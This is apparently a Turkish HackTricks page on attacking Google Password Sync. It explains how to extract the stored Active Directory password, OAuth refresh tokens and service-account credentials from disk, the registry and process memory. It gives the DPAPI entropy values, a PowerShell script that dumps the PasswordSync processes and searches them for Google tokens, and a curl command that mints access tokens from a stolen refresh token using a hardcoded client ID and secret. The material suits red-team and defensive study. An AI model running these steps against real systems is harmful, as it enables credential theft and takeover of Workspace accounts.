GPS - Google Password Sync

AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Temel Bilgiler

Bu, Google'ın AD ile Workspace arasındaki kullanıcı şifrelerini senkronize tutmak için sunduğu ikili dosya ve hizmettir. Bir kullanıcı AD'de şifresini her değiştirdiğinde, bu Google'a ayarlanır.

C:\Program Files\Google\Password Sync dizinine kurulur; burada yapılandırmak için PasswordSync.exe ikili dosyasını ve çalışmaya devam edecek olan password_sync_service.exe (hizmet) dosyasını bulabilirsiniz.

GPS - Yapılandırma

Bu ikili dosyayı (ve hizmeti) yapılandırmak için, Workspace'de bir Süper Yönetici ilkesine erişim vermek gereklidir:

Google ile OAuth üzerinden giriş yapın ve ardından kayıt defterinde (şifreli) bir token saklayacaktır
Sadece GUI'ye sahip Alan Denetleyicilerinde mevcut
Workspace kullanıcılarını yönetme izinlerine sahip bazı GCP Hizmet Hesabı kimlik bilgileri (json dosyası) vermek
Bu kimlik bilgileri asla süresi dolmadığı için çok kötü bir fikirdir ve kötüye kullanılabilir
Workspace üzerinde bir SA'ya erişim vermek çok kötü bir fikirdir çünkü SA GCP'de tehlikeye girebilir ve Workspace'e geçiş yapabilir
Google, GUI'siz alan denetimleri için bunu gerektirir
Bu kimlik bilgileri de kayıt defterinde saklanır

AD ile ilgili olarak, mevcut uygulama bağlamını, anonim veya bazı özel kimlik bilgilerini kullanmasını belirtmek mümkündür. Kimlik bilgileri seçeneği seçilirse, kullanıcı adı bir dosyada diskte saklanır ve şifre şifrelenir ve kayıt defterinde saklanır.

GPS - Diskten şifre ve token dökme

Not edin ki Winpeas GPS'yi tespit edebilir, yapılandırma hakkında bilgi alabilir ve şifreyi ve token'ı bile şifreleyebilir.

C:\ProgramData\Google\Google Apps Password Sync\config.xml dosyasında, yapılandırmanın bir kısmını bulmak mümkündür; burada yapılandırılan AD'nin baseDN ve kullanılan kimlik bilgileri olan username yer alır.

Kayıt defterinde HKLM\Software\Google\Google Apps Password Sync altında, AD kullanıcısı için şifrelenmiş yenileme token'ı ve şifrelenmiş şifre bulunabilir (varsa). Ayrıca, bir token yerine bazı SA kimlik bilgileri kullanılıyorsa, bunlar da o kayıt defteri adresinde şifrelenmiş olarak bulunabilir. Bu kayıt defterindeki değerler yalnızca Yönetici tarafından erişilebilir.

Şifrelenmiş şifre (varsa) ADPassword anahtarının içindedir ve CryptProtectData API'si kullanılarak şifrelenmiştir. Şifreyi çözmek için, şifre senkronizasyonunu yapılandıran kullanıcı ile aynı kullanıcı olmanız ve CryptUnprotectData kullanırken bu entropiyi kullanmanız gerekir: byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };

Şifrelenmiş token (varsa) AuthToken anahtarının içindedir ve CryptProtectData API'si kullanılarak şifrelenmiştir. Şifreyi çözmek için, şifre senkronizasyonunu yapılandıran kullanıcı ile aynı kullanıcı olmanız ve CryptUnprotectData kullanırken bu entropiyi kullanmanız gerekir: byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b }; Ayrıca, 0123456789abcdefghijklmnopqrstv sözlüğü ile base32hex kullanılarak kodlanmıştır.

Entropi değerleri, aracı kullanarak bulundu. Araç, CryptUnprotectData ve CryptProtectData çağrılarını izlemek için yapılandırıldı ve ardından PasswordSync.exe'yi başlatmak ve izlemek için kullanıldı; bu, yapılandırılan şifreyi ve kimlik doğrulama token'ını başta çözecek ve araç, her iki durumda kullanılan entropi değerlerini gösterecektir:

Ayrıca, bu API'lere yapılan çağrıların giriş veya çıkışında şifrelenmiş değerleri görmek de mümkündür (eğer bir noktada Winpeas çalışmayı durdurursa).

Eğer Şifre Senkronizasyonu SA kimlik bilgileri ile yapılandırılmışsa, bu da kayıt defterindeki HKLM\Software\Google\Google Apps Password Sync anahtarları içinde saklanacaktır.

GPS - Bellekten token dökme

GCPW ile olduğu gibi, PasswordSync.exe ve password_sync_service.exe süreçlerinin belleğini dökmek mümkündür ve yenileme ve erişim token'larını bulabileceksiniz (eğer zaten oluşturulmuşlarsa). Ayrıca, AD yapılandırılmış kimlik bilgilerini de bulabilirsiniz.

PasswordSync.exe ve password_sync_service.exe süreçlerini dökün ve token'ları arayın

```powershell # Define paths for Procdump and Strings utilities $procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe" $stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe" $dumpFolder = "C:\Users\Public\dumps"

Regular expressions for tokens

$tokenRegexes = @( "ya29.[a-zA-Z0-9_.-]{50,}", "1//[a-zA-Z0-9_.-]{50,}" )

Show EULA if it wasn't accepted yet for strings

$stringsPath

Create a directory for the dumps if it doesn't exist

if (!(Test-Path $dumpFolder)) { New-Item -Path $dumpFolder -ItemType Directory }

Get all Chrome process IDs

$processNames = @("PasswordSync", "password_sync_service") $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id

Dump each Chrome process

foreach ($processId in $chromeProcesses) { Write-Output "Dumping process with PID: $processId" & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" }

Extract strings and search for tokens in each dump

Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { $dumpFile = $.FullName $baseName = $.BaseName $asciiStringsFile = "$dumpFolder${baseName}_ascii_strings.txt" $unicodeStringsFile = "$dumpFolder${baseName}_unicode_strings.txt"

Write-Output "Extracting strings from $dumpFile" & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile

$outputFiles = @($asciiStringsFile, $unicodeStringsFile)

foreach ($file in $outputFiles) { foreach ($regex in $tokenRegexes) {

$matches = Select-String -Path $file -Pattern $regex -AllMatches

$uniqueMatches = @{}

foreach ($matchInfo in $matches) { foreach ($match in $matchInfo.Matches) { $matchValue = $match.Value if (-not $uniqueMatches.ContainsKey($matchValue)) { $uniqueMatches[$matchValue] = @{ LineNumber = $matchInfo.LineNumber LineText = $matchInfo.Line.Trim() FilePath = $matchInfo.Path } } } }

foreach ($matchValue in $uniqueMatches.Keys) { $info = $uniqueMatches[$matchValue] Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" } }

Write-Output "" } }

</details>

### GPS - Yenileme jetonlarından erişim jetonları oluşturma

Yenileme jetonunu kullanarak, aşağıdaki komutta belirtilen istemci kimliği ve istemci sırrını kullanarak erişim jetonları oluşturmak mümkündür:
```bash
curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token

GPS - Kapsamlar

Bir refresh token'ına sahip olsanız bile, erişim token'ı için herhangi bir kapsam talep etmek mümkün değildir çünkü yalnızca erişim token'ını oluşturduğunuz uygulama tarafından desteklenen kapsamları talep edebilirsiniz.

Ayrıca, refresh token her uygulamada geçerli değildir.

Varsayılan olarak GPS, kullanıcı olarak her olası OAuth kapsamına erişime sahip olmayacaktır, bu nedenle aşağıdaki betiği kullanarak refresh_token ile bir access_token oluşturmak için kullanılabilecek kapsamları bulabiliriz:

PreviousGCPW - Google Credential Provider for Windows NextGWS - Google Platforms Phishing

Last updated 3 days ago